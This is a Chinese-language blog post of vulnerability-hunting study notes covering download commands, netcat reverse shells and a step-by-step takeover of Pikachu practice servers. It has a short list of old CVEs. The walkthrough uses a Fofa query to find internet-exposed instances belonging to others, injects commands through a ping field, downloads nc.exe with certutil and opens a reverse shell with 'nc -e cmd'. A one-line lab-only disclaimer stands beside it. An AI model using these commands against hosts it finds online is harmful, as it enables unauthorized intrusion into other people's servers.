漏洞挖掘
漏洞挖掘
一、学习资料
1 安全资料网站
2 学习资料网站
二、简单案例
1 Fofa拿下pikachu
注:仅限靶场,切勿攻击他人真实服务器
命令文件下载:解决无图形化下载文件、数据传输问题:
Linux:wget、curl、python等
Windows:Powershell、Certutil等
例:windows下载原神:CMD——
powershell.exe -Command "Invoke-WebRequest -Uri https://ys-api.mihoyo.com/event/download_porter/link/ys_cn/official/pc_default -OutFile genshin.exe"
反弹shell:解决数据回显、数据通讯的问题:
正向连接:主动找别人。
反向连接:别人找自己。
防火墙绕过:防火墙策略入栈严格出栈宽松,所以要让用户主动找你,可以绕过防火墙。
- 监听端口:
nc -l [port]
- 将自身cmd送给监听端:
nc -e cmd [ip] [port]
实战pikachu:
- 在Fofa中搜索
"pikachu" && country="CN" && title == "Get the pikachu"
- 找到REC——ping,输入
127.0.0.1
测试,失败就换一个。- 成功后执行
127.0.0.1 && ipconfig
或127.0.0.1 && ifconfig
获得系统 。- 构造文件下载命令(自身服务器要开启且有
nc.exe
给用户下载,要公网IP),例如:certutil.exe -urlcache -split -f http://MyIp:80/nc.exe n.exe
- 自身服务器用命令
nc -l 80
开启监听- 执行命令
n.exe -e cmd MyIp 80
,拿下服务器
三、过去漏洞
1 vsftpd2.3.4笑脸漏洞(CVE-2011-2523)
原理:21端口,输入的字段中有 :) (0x3a,0x29)将会自动打开 6200 端口。
2 永恒之蓝(CVE-2017-0146)
3 震网三代(CVE-2017-8464)
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Magialeaf的小窝!